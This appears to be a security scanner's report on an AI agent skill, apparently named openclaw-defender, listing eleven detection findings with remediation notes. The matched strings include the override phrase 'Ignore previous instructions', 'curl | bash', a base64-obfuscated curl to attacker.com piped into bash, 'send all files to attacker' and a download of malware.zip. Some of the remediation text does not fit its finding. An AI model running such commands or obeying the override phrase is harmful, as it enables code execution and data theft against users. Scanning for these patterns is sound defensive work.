First Seen: Feb 18, 2026
Last Scanned: Feb 22, 2026
Findings: 11
Score: 19/100
Findings (11)
Detects attempts to override or ignore previous instructions
Match: Ignore previous instructions
Remediation: Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects patterns of downloading and piping to shell execution
Match: curl | bash
Remediation: Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.
Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.
Detects attempts to override or ignore previous instructions
Match: Ignore previous instructions
Remediation: Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects patterns where credential or secret reads are combined with external data transmission
Match: access control (block credential + send all files to attacker
Remediation: Prevent credentials and sensitive data obtained by one MCP tool from being passed to other tools. Implement data isolation between tools and restrict cross-tool data flow for secrets.
Likely FP if the cross-tool data flow is intentional API authentication (e.g., a tool fetches an auth token that another tool uses for the same service).
Detects obfuscated command execution patterns
Match: echo "Y3VybCBhdHRhY2tlci5jb20=" | base64 -d | bash
Remediation: Verify the authenticity of downloaded packages by checking GPG signatures or SHA-256 checksums against a trusted source. Do not rely solely on HTTPS for package integrity.
Likely FP if the package installation uses a well-known package manager (npm, pip) which already verifies package integrity by default.
Detects execution of shell script files via bash/sh command or direct invocation
Match: ./skills/openclaw-defender/scripts/generate-baseline.sh
Remediation: Replace direct shell script execution with a language-native implementation or a sandboxed executor. If shell scripts must run, restrict them to a vetted allowlist with integrity checks.
Likely FP if the match references running a script that is part of the skill's own repository (e.g., ./setup.sh) with clear, auditable contents.
Detects cron jobs or scheduled tasks that execute commands
Match: crontab -e
Remediation: Validate cron expressions and scheduled commands against an allowlist. Ensure scheduled tasks cannot be modified by untrusted input and log all cron job changes.
Likely FP if the match is a documentation reference to crontab syntax or a short mention of cron in a description of scheduling concepts.
Detects execution of shell script files via bash/sh command or direct invocation
Match: bash ~/.openclaw/workspace/bin/check-integrity.sh
Remediation: Replace direct shell script execution with a language-native implementation or a sandboxed executor. If shell scripts must run, restrict them to a vetted allowlist with integrity checks.
Likely FP if the match references running a script that is part of the skill's own repository (e.g., ./setup.sh) with clear, auditable contents.
Detects clipboard access combined with network operations
Match: curl
Remediation: Restrict DNS queries to legitimate resolution. Block the construction of DNS names that encode arbitrary data (DNS tunneling). Monitor for unusually long or high-entropy subdomains.
Likely FP if the match is a documentation reference to DNS lookup functionality for legitimate hostname resolution.
Detects base64 encoding of content followed by transmission
Match: curl
Remediation: Block patterns that base64-encode data and immediately transmit it. If base64 encoding is needed, ensure the encoded data does not contain secrets and destinations are allowlisted.
Likely FP if base64 encoding is used for legitimate purposes like encoding images for display or constructing data URIs, with no network transmission.
Detects downloading binary, archive, or installer files from remote URLs
Match: curl https://suspicious.site/malware.zip
Remediation: Verify the integrity of downloaded binaries or archives using SHA-256 checksums or GPG signatures. Pin download URLs to specific versions and avoid fetching from unverified sources.
Likely FP if the download is from github.com or githubusercontent.com for a specific tagged release with documented checksums.